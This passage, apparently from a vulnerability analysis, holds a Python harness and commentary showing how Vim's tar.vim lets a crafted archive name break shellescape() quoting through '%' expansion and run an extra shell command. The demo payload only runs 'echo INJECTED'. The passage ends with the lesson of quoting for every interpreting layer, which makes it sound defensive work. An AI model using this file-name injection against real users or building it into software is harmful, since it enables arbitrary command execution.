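    ':p'-style modifiers are not modelled."""
    out = []
    i = 0
    while i < len(cmdline):
        c = cmdline[i]
        nxt = cmdline[i + 1] if i + 1 < len(cmdline) else ""
        if c == "\\" and nxt and nxt in "%#!":
            out.append(nxt)
            i += 2
        elif c == "%":
            out.append(curfile)
            i += 1
        else:
            out.append(c)
            i += 1
    return "".join(out)


def tar_browse_command(tarfile, special=False):
    """Stand-in for tar.vim line 147,
        exe "silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile)
    with 'echo archive:' in place of 'tar -tvf' so no archive is needed."""
    return "echo archive: " + vim_shellescape(tarfile, special)


def run_as_vim_would(tarfile, special=False):
    """Expand '%' against the current buffer's file name (the tar file that
    was just opened), then hand the line to sh -c as :! does.  Returns the
    shell's stdout."""
    cmdline = vim_expand_bang(tar_browse_command(tarfile, special), curfile=tarfile)
    proc = subprocess.run(["sh", "-c", cmdline], capture_output=True, text=True)
    return proc.stdout


def injected(stdout):
    """True when the attacker-controlled 'echo INJECTED' ran as its own shell
    command instead of staying inside the quoted file name."""
    return "INJECTED" in stdout.splitlines()


if __name__ == "__main__":
    for special in (False, True):
        label = "shellescape(name, 1)" if special else "shellescape(name)"
        print(label)
        print("  shell sees :", vim_expand_bang(tar_browse_command(EVIL_NAME, special), EVIL_NAME))
        print("  injected   :", injected(run_as_vim_would(EVIL_NAME, special)))
```

With the plain shellescape() form the shell receives `echo archive: 'foofoo%;echo INJECTED;'bar.tar;echo INJECTED;'\''bar.tar'`: the quote inside the expanded name closes s:Escape()'s quoting, the following `;echo INJECTED;` runs as a separate command, and INJECTED appears on a line of its own. This is the same mechanism that carries the digest's `eval eval ...` payload. With the backslash-escaped form the `%` survives the `:!` expansion as a literal character and the whole name stays one shell word. The rule it illustrates is general: quote for every layer that will interpret the string, in the order they run; quoting for the last layer alone is not enough.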